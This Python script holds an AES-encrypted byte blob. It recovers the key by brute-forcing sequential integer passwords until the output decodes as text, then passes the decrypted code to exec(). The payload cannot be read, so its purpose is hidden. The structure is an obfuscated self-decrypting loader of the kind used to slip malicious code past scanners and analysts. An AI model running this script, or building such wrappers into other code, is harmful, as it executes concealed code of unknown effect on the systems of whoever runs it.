from Crypto import Random
from Crypto.Cipher import AES
import hashlib

class Decryptor:
	def __init__(self, key, file_name):
		self.key = hashlib.sha256(key.encode('utf-8')).digest()
		self.file_name = file_name

	def pad(self, s):
		return s + b"\0" * (AES.block_size - len(s) % AES.block_size)

	def decrypt(self, ciphertext, key):
		iv = ciphertext[:AES.block_size]
		cipher = AES.new(key, AES.MODE_CBC, iv)
		plaintext = cipher.decrypt(ciphertext[AES.block_size:])
		return plaintext.rstrip(b"\0")

	def decrypt_file(self):
		dec = self.decrypt(self.file_name, self.key)
		return dec

class BruteForce:
	def __init__(self, encrypted_codes):
		self.encrypted_codes = encrypted_codes
		self.password = 0

	def start(self): 
		status = True
		while status:
			try:
				test = Decryptor(str(self.password), self.encrypted_codes)
				decrypted_code = test.decrypt_file()
				executable = decrypted_code.decode() 
				status = False
				return executable 
			except UnicodeDecodeError:
				self.password += 1

encrypted_codes = b'\xd0e\x89[\xdeM\xec\x1d/\x05\xe9"pu\xaf\xce\x91\xd4_e\x00e`\xc2\xffml\xfd\xdde\xcb\x97s\xce\xfd4\x8d\x0f2\xd0\xf5\xf4\x86p\xa7K\xe6CSHD\xe2k\xe2-\xc4E\xcb\xdd\xba\xecf\xde~\x91\x12c\x9d\xfb@\xb9\x13\xff\xd6\xf4\xd7E\xda\xea\nD4\xe2\xa7/\x08\xff\xc0,\x02m\x08\xfd\xf3X%\xa8V\x8c\xabp\x1a\x1d\xbeFy\xfcA9N\xa5A\x8c\xf4D}O\xf4E\xcdkA\x18\xaa\x05\xd4\x91\x1bf`g\xc5\x98\x0bc\x06\xfd\x00\x9e\x10Q\xfa\t>\r_\x14\xacJ\xe6\x14\x93\x84\x08l}U=C&\x80\x90\xeeK\xd3e\x06\xc4\xe9a\xee\xc2\xc3\xddsm\xe44\x8c\xdd\xef\xd1\xcdb\xe3r9\xa0k\xf6@\x1eaO\xbfx\xb2P\xdf\n\xb4-\xc0\xa7HP\x1d\t\xae\xfc\xb7D\xf7\xc7$\x03\xc2\xe4\x1eB\x971\xe0\xc5\xe7\xd9}T\xf2\xf9\xc3\xd1c\x01\x13\xed^A\xa4\xf8^\x15N\xf5\x8d\xf9\x05o\xf9\x9bP.\xed?\xe2\xef\xb0\xbd\x1a|\r\xd2\n\xb4:\x00Ck>\xc26H\x18;X/I&\x1d\xb6X\xcd\x92\x82,\xe2\x94Q\xeb\x0e^?\xe9\x06\x88\xb3+\x03\xb8\xb2\xd0\x17G\x84\xf3!c\xd3\x07\xea.}N>Yb\x07\x96\xc9\xe6\xa3LU\x04\xedu9\xe8}\xc8\xa0\xecv\xee \xe8\xa5\xc0g0r\xb3\nmv\x81\xbe\x1b\xe5\x0e\x86\xa8\x95K\x112\x00\xbe\xc9&\xc1i\xad\xd3\xce\x9fxn\x84\xba\xb4^\xdf\x01\xf2q\x1e2q><*v\xcb\xd8\xa3\xfbP\xb0\x9e\xdb\xcb\xc1\xab\xed\xbb\x97P\x99\\Ph]\xa1\xcf\xa9"\x0e\x83r\x88\x14\x18\xf0\x141\x17\x04\xe2cm[#b\xeb\'\x97\xfb\x0cu\x9c\x00\xbde\x87\x17\x1d\xf5\xab`\xd8[\xa9\xeet\x87n\x12k\xae\xf9"k@\x1e\xf2\x18\n\xfa\xcd\xd4\'\x06L\x0f+w\x13\x80/\xc0\x9f\xf5\x9c6\xad\xeb\xf2[\xc8\x10Nw\x0b,\x80\x0e\x83\xdbZ~"\xe7\xf1\xc2c\x80]\xe9/ON\x01\x15~\xe7h\x97\xbd\xda\xba\xeb \xa6v\xd7\xff\x1dW1\xb9\xf7\x08\xc3\xfe\x80Q?\x10\xd6SQ\x8diR\xcar\xa5\x82\xd1\xdd\xf2c\'\x87\x122\x8b,_\xb4\xc5\xaf>\x13\xe3\xfd\x10RP\x00\x8e\xb6\xebE\x13\xbb\xa5\x0c\x1aP\xcf\xfb\x0cV\xf9\xc5\x1ew\xc0?8\xdatI5h\x92\x97\xb7\x97\x8c\xb4\x05\xe2\x7f\xbd\xf8\x08BM5\xea\xfe\x886\xcb\x1fi\xa0\xd5\xac\x90_\x9fc1\xc3\t\xcau\x86+x\x0b\xc4\xc2\x0b\xfd\xe36\xdcv\x08T\x83\x19i\xe1\xcc\x86oY\xb7Y\xdf=\x92DdaV\xd6\xfe\xdel\xbf\x00\xc4\x8b)\x12\xc6\xb67\xd0kM{3(\x9c\xbb\xf2\x16\x95\x8ax\xeb\xa1\x02]>\xc3J\xd9=\x1cFO\xd41(?T\x84\xb1\x89\x10&z>\xacm\xf6\xd9:\x03\xe7\xee\xea1O#\xee\xcd\xa1`H`\x1e\xdb1\xd3\x052\x8d\xffq(\xed\xa2\xdd\xcc\x8c*jCT\xed\x86\x1d\xb2>\xeaf\xce\xae`P\xdb\xa9_\xdd\xe1\xbdJ;$\xc6&\x7f\xfd\x86?\x19\x8a\xc4\xbf3\x81R=\x1c\x7f\x0c;\xb7\x1b\xdd\xb8+!\xfe\xfd\xa2gWZ\x83\xe6ad*\x0e\xb0\xe3g{\xa4\x8aP\xe2\x05\x18O\xf9\xf8\x87\'\x98L~X\xe4\xed\x9eA\x03\xf0\xb9"\x05s\xbd\x0b\x87+L/\xf1\xea\xb3a\xe9\xa7\xa9\xc3{!\xa0/\x9e\xff\xb8,^\x0e\x01\x08\xbeA\x92\x8a\x11\x8eHN\xbb\x7f=M\xf2\x17\x9e\xf5ZGG\xeds\x19Q\xa9s\xe0\xbc\x853_*\x9b\x9f\xb6.G\x0b\xc2\x9d}\x86/$\xb4\x93\x99\xb1\xa5Uc7l\x90\x1d9\xa6\xe4\xf3Mj\xa3\xd6.\xe3\x91\x02\xb1\x00g2\x8b$\xa9nW\xechX\x88\xb7\x80zY\xd8`5\xd3\xb1\xaa\xe5\x06G\x02\xc9\x95\xd5\xd5l\x8a\x8e_\x99}\xbdF\xc9p\xf4\x86\x0c\xdfsNa\xd6\xde\x8e\xf6\x81\xc1\x93\x7fUQbSAv\xa6^#\x02\xd0\r\xcd|\x0b\xc3yO\x8b\x08\xa2\xff\xd5=\x08\xb5 .q\x95\xa8B\xb4h\xbdK`\xb9\xca6\xd2T)\x9c\xb1\xac=\xd6\x82\xf4\x14\x00\x88\xf4\x88O=\xe9\x90\x96/\xe5\x9a\x84`?AmU\xad\xa5@\xc7!\x16\x96(\xf0P\x9d\x05Y\xafGg\x85 \xbf629m\xa65\x89\x8bf\xcf\x97N\x13$\xa1G\xc3\xef\x92&\xc6\xce\x0f\xa7\xa3\x0f\xe0\xd9;<\xda\x83\x8e\x18\xb6\xd5\x02\xb3s\x99\xb9\xcc2\x91\xb7\xb7\xc2\xc8H2\xac\x88\x16\x95B\x87\xd7\x90\xc7\x05\xa4\xcf\xd8}\x97Y\x96\xb5\xb0*!`b\xdb\xbenT\xaaqR>I^L<\xdc\xb0\xbc\xa4\xcb\x13\xca\xea\xcaP\x9d\xefU\xc1\xb2ME\x11\xd4\xe3O\x02\x0b\xb9\xb3\xbfv\xfe\xcc\xac\x97R)\x8b\xe9I\x1e\x9cA\x93\t\x96\xb1:*\'+\xa4\xce\x01n.\xdeom\xe7z\xe5\xae\x1e\xe5\xedD\x85\xbb"\x88]\n\x15$\xf2k\xd5\x8fe\xfeD,\xfa\xb4,\x9bT\xeaG\x87*\xce~\xb7\x9f#\xb0\xf5\xfdU\x17\xfdt\x8a\xd4\x988s\xf6%\x91b\xbc*\x7fs\xcb\xb2.\xc7\xe3\xa0\x17\x08\xfb\x82\\\x89\xee\xd4\x8c%\xbdq\x89l\x98N\\\xaf\x9c\xb9\x03\xfb\xe5\xb0\xe4\xa3\x1c|i\x1c\xac^\x04\xf1p\xa1\xaf\x9d\x11\xb0\x06\x0c\xac\x97\xc4\x03\xd1\xf2!\xd8\xde$\xe3\xb5M\xd0\x1c\x9a\xba\x8b\xe6\x8a\x90\x9d\x05\x9d~\x10,\xf6\xd4\xd1\xef\x80\x82\xaa3\xf7f\xe1\xbfs\n;\xb1\x96\x98\xf6\x81\x88\x98$\x89\xcd\x15\x0eM\x02ul\xed\xabw\xe3H"\xa7\xf0\x99\xa6OE$\x14\xb7\x0e\xbe\xd8\xcb\xbd\xc8\x11\xd59\xa1\xfc\x9c\x0f\x85\xd8;L\x0c\xb9\x15\xdf)C\xb8`\xe7\n\xdf\x8b.5B\xd9\x0e\x83\x93\xca\xba\xdd8Ox\xd31\xdf\xed@\xb3\xed\x18\x10\xb74j\xf9\xc5G\x18j\xe6\xfe\xfa\xc1M\x86\xb3\xf7\x13\xbc\x93d\x12\xc8o\xee\x8f\x12\xca\x1f\xbf\tS\xdc$"\x88(:\x0e\xcb\x14W\x8ep\xf1\xa3\x9bywQ\x00JI=\x19\x90M\xf0\x984"\xd16\xceN\xf3\xde\xc7,\xf6\xcbG\xf2(\x8eU\xac\xce\xc1\xec\xbf4\x8aUC\xf9as<E2N\xee\xc9\xaf\xf7\xab\x1f\x88\xb7\xff "Pa\x01\x05G}%\xc5w \x9d\x9aD\x8d\x03\xbb\x1c\x80\x896/\\\xe0\xea\xb1\xd2\xc4\xd0\x98\xd4\xb9\xb75}LQ\xbd\x1cs\x13G\xd9\xa9\xa7i\xcb\xbats\xdc>\xb3j\xf3\xa4\xd6\x0c\x83\xb6|\xf3^\x81\xc6\xc7^\xae+\xcdEv\xf7\x7f\x8d\x8f;\nQ\xff$}\xfa\x14\xb9Q\xd7\r\x1b\xed\x8e\xa9;*\xd9X\xff\t*\xeb\x87\xa1@_\xb6\x93\n\xa1\xb1a\xeag[i#\x82V\xd1\xf6\xd7\xc3\xa9\xc2jwB<H\x8c\x83vt\x06\xe3\x0f\xed,/\n\xf5:N;\x81\x1e\xb3?\xbb6\xb3KWK\xe6\xd0\x8e\xe0\xec\x05\x1djM\x1e\x86\x1b\x7f\xff\xa2\x18\x11R\xfd\xe9\x18\xcbq\xc50&\x89\xa7\xdcA\xa78H\x0c\xd9\xbd\xd5\xe6\xe7\xb9\xc9\x93\x01\xce\x8bm\xe5V\xfem\xea\x99\xd2/fz\xdd]\xbf8\x8f8\xdaJh}n\xd6\x0c\xfa\xce\xc3\xc8\x92\xe8J7n\xa6Rd\xc1\xba\xa3\xbbh\xa4\x01>\x90.>1\x11\xd9\x8a\x06!\x9d\xa8\x8cP\xb8\x1a50\xe2_\xfc\xfc^H\xbd4Z3\x99\x0f\x8f$qSU\x8et%\x8f\x91@\xd0\x01\x0eH\xeb\xbezG7\xc5<\x87\xf5a\xab\x8c\x13\xe2\xfeP\xab\x16b\x1bu\xc7\xd9\xf0\x1b{\xcf\xf6\xa3\xa0h\xac\xb5\xcfr\xd5\xd3\xf1\xe0a\xfa\xf9\xd1\xe7\xe0[?\xf3\x9cF\x9f}N\r\xa9\x0b\xb7\x1f\xc4f\x98\xf1\x1d\x1f\x88\xb9\xbb\x89\xfe\xd2z\xd6\x1f\xd15\xd9\xa6Y\x0f\xc7\x07a\n\x04\xec\x0f\xf4\xf4\xcba\xd0\xe6\x88\xca \xb9\xb8y\xa7\xacI\x99l\xf8&\xb1W\xfc\x15\xf2\x8f\xeb\xf2\xf8\xae7\n\xea\xab9\xe4\xd7\x0b\xad\xb6z\xaa5@K\x90\xf6\xb94\x1a!\x80?\x8dv\xa0"e\x96\xf0\xee\xfe\x15~\xbc)\x89K\x85\xf4\xae\x1c\x9bdH\xb1!\x89\x80r\xf0~@\x1a\xf5=\x1c\xa2\xb0\tJ!$^\x99\xef\xbb\x8c\xd8\xe4\x00\x87%\xa2\xe8\xf7\xe9\xf0\'\xf6\xec\xd1\xae\xc4\x82j\xabH\xf7\xa6\x1e\x0c\x15\x9d\xba\x9f\xa4\x0fg\x07\xd1\xf2\x02&\xa5f\x11e\x16\x14l\x7fq\x87\x8e\xa1S\xbe\x8d\xecv\t\x15O\xb9\xc4Q\xc1\x8e\xb2\x05\x0e\xfd\xe2\xc2\xca\xa2\x99U\x9c#U\x98\xddV={\x13\xa7vC(\xcb\x19\x90\xd2Z\xb7\xcbM+@&X\xcc\x19\x8e\xb00q\x11\xb5\xb1EK25[\x8a\xea\xe8\x98\xe2W\xa4t*\x81Cc\xe9X@\x0c\xf2\xf6\xa3\x91G;\xc4Y"\xb6l\x15\x84\xe3F\xa3\x91\xdd\xcf\x8b5\xd0\xc5\xcf\xfd\x1d\x1a\x00)\xd8\x9c\x86l\xb3\x88\x82`\xacQ\xe4\x1e\xf3G\xa2[\x1c\x1f\xff&\xcep(\xa4\x1f;\xb0[\xc1\xb02u\xc1\xde\x19Rd\xa8P\xa0\xa72$\x93-#\xb7\xdd\x00i\xd3\x86\x06\xfd>\xc62\x05\xf3\x1bV,\n\x84w)8G\x92]y\x06\x9f\x8e~g"\xa0M0\x8c\xc4Q\x12\x0f\xed\xe7\xc3s\x07\xa5\xd2\xc9aN\xecX\xa1\x11\n\xeb6?\xc2\x1b\xce\xc7\xb6\x07\xfd\xbf\x97\xdf\x04H\xcd\x9f\xfb\xc8k\x1dS\x9e\x91c\x13\xab\xcfu\x19g\xc8\xbc\t\xff\x80\x02\xbd\xbb\x98\xa0\x11\x1dZ\xbe\xf9;-(ag\xb3\x82\xddo\xa9\xae\xf8?\xa6]\xba/\x90t\xc8\x1d\xc9\xa9v\x92\x83\xbbbR0!a\x11g\xdeK\xfdX\xea8\xb4\x16Q>a\xdd#\x80\xb7\xd9Oe\xcaKmy\xa3\xca 7w\x82\xf3\xfc(\x92\x80\x9a\xf4\x18\x1e\xd8\xf0\x9e\xa1\xff\xbc|\xb7\r&V\xef1\x0c\xba\xb1Y\x06FX\xd0"*\x9fl\x9d!\xc6Xr\x83\xd2\t\x97T!\xc3\x9a\x11+\x7f$\x8d\x9f\x90\x1fT\x03\xec\xd7\x11\xa8J`?\x9b\xbb\xe9D\xaa\xcf4\xd9}\xd06q\xcf\x19\x85\x93%y}\x13\xf9\xcd\xa8\x00\xc1\xf6c\xef\x90\xbf\xcb\xf2\x9fZ\xcb\x94-7\x9e$Sa\xe3\x8f8\xa2<\x1f\xb2\xc4\x8f\x02g\xcdL\\\xa3\x0b4\xf7\xfc\x89=e\xc7\xdf\xbd\x1e}\xc4\xd9>2\x80T\x91t.rwn?&[\x93M\xe7cH\xf8\xb9`k\xb9uu\x85\x83\xac\xd3\xeem>\xd95\xade\xdc\xb3\xf8\xdaJ\x80\xf0\xf9}\xd9}\xbdJ\x9fJl7\x8a\xe9\x07vo\xd7"\xd8\xa6\xd3B\x88\xf2_\x08x7y\xaa\x9d\xaf\x9b\x1f^\xa2j\xad%c\x00\xd6\x16\x14\xb7\x94\xf1J\x11\xa4LR\xdd\xe0\xe5*\x97\x16\xb9\xd98\x97\xaf\xecW\xed\xc6s\xdc?\x125\x9d\x18\x15\xf6,\x03\xb9 Z\x83\xd7\xf1\xa2\xf5I=\x17\xa7_b\x99\xfaqN\x86\x9bvk\xf9\x8cX\xd4Z6\xafP\xa8\x8b\xa2&{\xa5,=\xf5\x95\'#f8\xf25d\xbf\xc1\xe7R\x8ea\xf0\xfc\x99^m]\x80)A~\x14\xdd\xed\xfe\xe9\xbe\xdb>\x9c\xbf\x97\x01R\x9f\x00#\x89C\x00\xc4jP\x1d\x17$\xd1y\x18%\x90\xb9\xf3=X\x0c\x96\x9d#\xaeI\xa5:\xf9})\xff\xd3\xb4\xea\xa0\xda\x81mt7\xf3\xa1]\xd3\x97m\xab\xb8\xc8\x82\xf5?6\x16`#\x9e3\xa9I}\xf7\xc3j\xce \xd9\xe4\xa8&\xae\xec\xfc\xd3\xa5\xf3\x8f\xbe\xba\xa3a\xcaZ>\xe2\x0c\xed\xf1\xfd\x98\n\x0fT\xa7\x9bj\xcfh1\x1d\x00\x8f\xb3f\xb7_\xcf\x12l\xeb#|\x18I\xf9e\x8bw\xe3\xad\x8a\xb1\x93\x13R\xd7@${V"\xb6\xdf\x14K\x00\x95B\x15-\xca\xf8\x0c\xc9\x9cY\\\x9b*v\xd1\xd8\x7f<5Bfp\xf2J\xb6\x8f"\x16\xc8\xea\xbd-mQ\x84\xa8\x82\xfa\x7f\x10~\xbd*\xc4f\x1d\x9a\xb8c7\xe1qS9\\\xe1\x00rf\xf1|\xf2\x90\xff\xd6S\xabG\x90\xc6 \xc2{\xb8!o\xe65\x12s\x13t\xfe8\xdd\xb0S\x89\xdb\xae\x94\xfd\xc9x\x9bA\xa3R\x16$\x841O\x10u\xcc\x17\xc2F\'xP\x7f\xc2\xa3\xec\x88\xff\xe6\x0f\xd4\x90\x1a\\(\x11\xe0\x07\xaa%\xbf\xbd\xe2\xb1\x9a\xf6;\x82\xda;8/qP\xa0\xcf<\xb1\xbc\x90)\x00V\xac2aS\xe5\x9c0\xce\x0e\xff\xa8\xcd\xe6\x0b\xc2\xc9TTZ\xad\xfc\xb5?[\xf2\xec\x94\xabU\xa8 \xf7[X\x13\xd1\xf4\t\xe5\xd9\xc0\xcb\x87\xbf\x10&\x1b\xd1\xab\x82\xc5\xec1-\xf9;\x19\xcb\x9c\xbc\x12/\xf0\x92e\x19-\xd6+\xfa\x04\x89\x0e\x83\xe8+\xeb\xda\xb0\xe7\xebT\x19\x15\xc0\x86\x06\xe5\x08@\x03\xaa\x14\x85\xa2\x9c\xa3J\n\xc0[\xff\xa4\x02&hF\x19\xf1\xdc[\xce\x14\x0f*J\x1f\xb0\x0b\xe95\x9al\x8b\x82\x15\xde\xe7\xf7"\xe2q\xb8\xb4\xbb$\x8aED\x91\x08\x1b\xb2 \x9f\xb1\x88\xb67\xdd\xd3#0N6\xac\xbf\xd4\x9d\xed\xc0=6\xa5P6\x10\xd1W\xe56\x03$\xc9b@U\x12\x016\xb8\x93\xbf\xc0e\xa0\xd2\xf0\xdc\xb8\xefs\xea\xcf\x9eGi\xcdH\xf5\r\x8f]\x8e\x8d\xa8\x00\xf4\x8e\xc1\x8b\x14I\x16W\xe0y%\xec\xd8h0\xa4rD\xa5\xe3\x9aZ-%\xe7h\xbc\xd6\xa2\x04\x86\xb4\xd5=\xc0ons\x81u\x858\xb5mEs\xcbJ\xea\n\x8d\xef\xb1\xbbF\x8d2\xb1J\xe1\xed\xc7\x19u\x9f\xb6\xc7\xbc\xf2j\x86;^\xbb\xb4\xa5\x8f\xf45\x04B\x96\x05u\xc1fM\x91]\x14\xa1T>kf\xbd\x88\xc9\xa9\xdd>\x1b\x99\x0f\x08=&\xbb&\xf7_\x01\x85\x07\x1f\xa9\xa7\x9c\x0b{\xbc6\x87\xc5\x8b\xd1\xb6\x81<h\xfd\x18\xa5\x88F\x11\x9e Q\xbb!\xfe\xcc\x01\xdau\xf3\xe2\x9f\xe4\xfc\xca\xe6\xf2\x03vx\xb5\xd7t\xe0\x11%\x97\xc8s\xb6\x81\xa4\x0e\x19\x04\x9b\xe60\xc2\xe9/\x02\x1c\x0b\xc6\xfd\x93\xb3\xa7\x8f\xa0\x1c\xbe\xcc)\xfd\x9d\xddO\xa7\x10\xe7\xcf\xe3<\x9f\xedwE\xfd\x17x*@\'\xfc\xec\xe9\xa9v\xc8\x01][\xf7\xd7\xa9FB\xa3\x8cV\xa5\xb6\xbb_\xf1\xa6\x1c\x10\x06\xa1\x84\xf0\xc7\x1aX\x97\xb0y\xe9\xfe\xf0b\xc4\x17\x8dZB#\x1b\xc8\xf52\x1b\xc3\x87\xe3\\r\xec\xe9\xc3\xcf\xb0s\xa3<\xe5\xee\'\x02\xd2\x08$kg\xb3B\x08X\x86\xcb\xc2\xd05xm\xa2\x80\x0fh>wMq1\x80\x1er\x1e\xeb^%u\x97\xcdb\xce\x83\x9aaE\x93&\x9c)\x00S9\xdd\xdb\x1b\xdd\xe3\xc3\xb0\xd2\x1a\x1b\x1b\xf7\rH>\xc5\xce\xfa\'2\x18\x082\xf0\xb1\xfb\x8c\xab?\xcf]\x12\xf2\x14EyX\xbfiX;cs\xfa\x91\xb9\x83\xf9\x99\xcc4\xb7\xeax\xbc\x04\x91n\xca\x97\xe94\x82\x9f\x8dE\x05\xbf\xb1\xe2y\x13R\x9b\xee\x9b\x84\xe3R\x08h$\xde9\x18\xaf\x14\xa7\xadm\xa8E\xcb\xc3U[\xd4!0\x99\xad\xaf\xa9\xcc\x11\xfev\x0e\xcb%\xdb"S\x84\n\x93\xa6\x9e\nO\x88\xc5\xc4\x92|\x9c\x9d\xeah\x99\x15\x19\x92[\xdd\x9d\x130\x0e\xcf\x07I\xc42:\xc2\x13\xaa1\n\xf7`n/\x90c\x91\xe2\x19\x8dTS\xe0\x08a$?#HK;*\x1a#T\xd3 \xee\x12h\xe2<\xa0JL\x1c\x96~\xf7M\xce\x8d\xd1\xba\x82=\xdf(\xcc\xc4l\x9d\xdf2\\\r\xd4\xa7\xf6I\x10\xd9\x88E\xd53\xe2\xf5\xf4._\xf2\xed\x17$\x07\x17`\x12\xb9J\xac\x17m\xc0\x98B\x8c(u\x89>\x17,tc\x94\x10\x85Hu\x96h>\x15Wvy\n\xd0B\xf40}\xa5IT\xb3+1\xd5ZG\xac\xa6#\xe6\x02-\x99\x01\x7f;#\xcf\x92\x90~D\x9c\xc5K\xc9\xee#\xc3\xed\xdb\xc0!\xd9\xbb\x99\xd5N'
brute = BruteForce(encrypted_codes)
executable = brute.start()
exec(executable)
